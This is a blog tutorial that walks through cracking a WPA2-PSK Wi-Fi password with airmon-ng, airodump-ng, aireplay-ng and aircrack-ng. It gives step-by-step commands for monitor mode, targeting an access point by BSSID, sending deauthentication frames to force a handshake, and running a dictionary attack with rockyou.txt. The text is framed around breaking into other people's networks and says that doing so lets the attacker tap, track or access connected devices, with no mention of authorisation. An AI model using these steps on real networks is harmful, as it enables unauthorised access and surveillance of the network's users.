Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng




By Rohit Jha       December 1, 2020




By Rohit Jha

December 1, 2020

Intro to Wirelesss Hacking

People developed wireless facility to provide internet connection in 1990s under the type of WEP( Wired Equivalent Privacy) but nope , geniuses like you created number of ways to crack it. So after so much of grinding over the encryption concept by the computer scientist and cybersecurity analyst and researchers they came up with the concept of of WPA2-PSK.

WPA2-PSK is WiFi Protected Access 2 along with a pre-shared key for wireless security, now here , WPA2 holds a stronger encryption algorithm and AES which is very tough to crack but again geniuses like you love to tear apart each and every obstacle coming up in their way, then who the hell is stopping you, we have the solution here , read it step by step and finish off this mountain too.

But yes, one has to be purely technical to get this obstacle done because penetrating and getting access to someone’s network isn’t small stuff. Once you’re done getting in, you can tap, track, or access any of the devices connected to that network.

Basic Algorithm behind the hack

The vulnerability or loophole in a WPA2-PSK system is that the password which is encrypted is embedded in the 4-way handshake. When a user authenticates to the access point( for kiddos: when you try to connect to a wifi), the user and the access point(AP) go through a password matching session or in a technical language we can say, a 4 step- process to authenticate the user to the access point. At that point of time our machine using a hardware tool which we will discuss next , tries to grab the password by matching it through our own list of words.

Requirements

Just a WiFi adapter with monitor mode enabled such as Leoxys 150N, ,Alpha 150 mbps(recommended one) and Alpha 1900(best one).

Step 1: Initiating Monitor mode

First, we have to put the wifi adapter (compatible one: Leoxys 150N, ,Alpha 150 mbps(recommended one) and Alpha 1900(best one)) in monitor mode. In easy words, we can say putting our technical arm into the air through which all the air-traffic of wireless networks are floating and passing by.

We can do it by opening the terminal and typing:

$: airmong-ng start wlan0

hacking_wifi_meusec

our wlan0 adapter will be renamed as wlan0mon by the airmon-ng

Step 2: Capturing wireless traffic

This is done in order to capture all the traffic in the air that passes by, it is done by our adapter. For this we take help from the command airodump-ng.

$: airodump-ng mon0

Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng 1

This command collects all the critical information of the wireless traffic in that particular area such as BSSID, number of beacon frames, power, channel , speed and encryption.

Step 3: Targeting the AP we want

In this step we have to target the access point that we want or capture the critical data. For this we will be needing the BSSID and channel of the targetted access point(AP) to do this. This is carried out by opening an another terminal and processing the below command:

$: airodump-ng –bssid C4:9F:4C:F8:0F:7F -c 11 –write WPAcrack mon0

Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng 2

C4:9F:4C:F8:0F:7F is the BSSID of the wifi

-c 11 is the channel of the AP we are working upon

WPAcrack is the file in which our pass will be saved

mon0 is the name of the adapter

Now in the above image , we can see , it has started focussing on only one AP which we want to crack and get its password..

Step 4: Using Airplay-Ng for Deauth

Now, to capture the encrypted password, we need to have the user to authenticate against the access point. If they’re already authenticated then we can just de-authenticate them and their device will automatically re-authenticate, meanwhile we can grab their encrypted password in the process. For this, we have open another terminal and execute the below command:

$> aireplay-ng –deauth 100 -a C4:9F:4C:F8:0F:7F mon0

Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng 3

100 is the frames of de-authentication which we are sending

C4:9F:4C:F8:0F:7F is the BSSID of the access point

mon0 is the name of our adapter

Step 5: Capturing the handshake

Now, in the previous step we made the user to disconnect from their wifi network to reconnect and now while reconnection by the user’s device to the AP or WiFi , airodump-ng will attempt to grab the wifi password. For this lets get back to our airodump-ng terminal and right there we would be able to see WPA handshake. This is signal that we were successfull in getting the password which is in an encrypted form.

Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng 4

Step 6: Decrypting the encrypted password

Now, we will be again using our main weapon command aircrack-ng to decrypt the encrypted password which we grabbed from the re-authenticatoin between the user and the AP. Now, this process depends upon how strong is our dictionary file or wordlist file. In easy words, we can say a list of different combination of words. This can be done by executing the below command

aircrack-ng WPAcrack-02.cap -w rockyou.txt

Hacking Wi-Fi: Cracking WPA2-PSK wireless networks using Airmon-Ng 5

here , WPAcrack-02.cap is the file name in which we wrote the airodump-ng command

-w rockyou.txt is our file containing list of passwords

After this process, it all depends upon our system processing speed, GPU , the wifi adapter we are using and the most important the password length and character types used in it. Password with more than 8 length including possible combinations of upper case, lower case and special symbols+numbers take alot of time. After this process a message on the terminal appears with the password.

Get the latest tech news and updatesethical hacking tutorials and cybersecurity tips and tricks. Check out MeuSec for more.


You Might Also Like

Subscribe to our Newsletter

Advertisement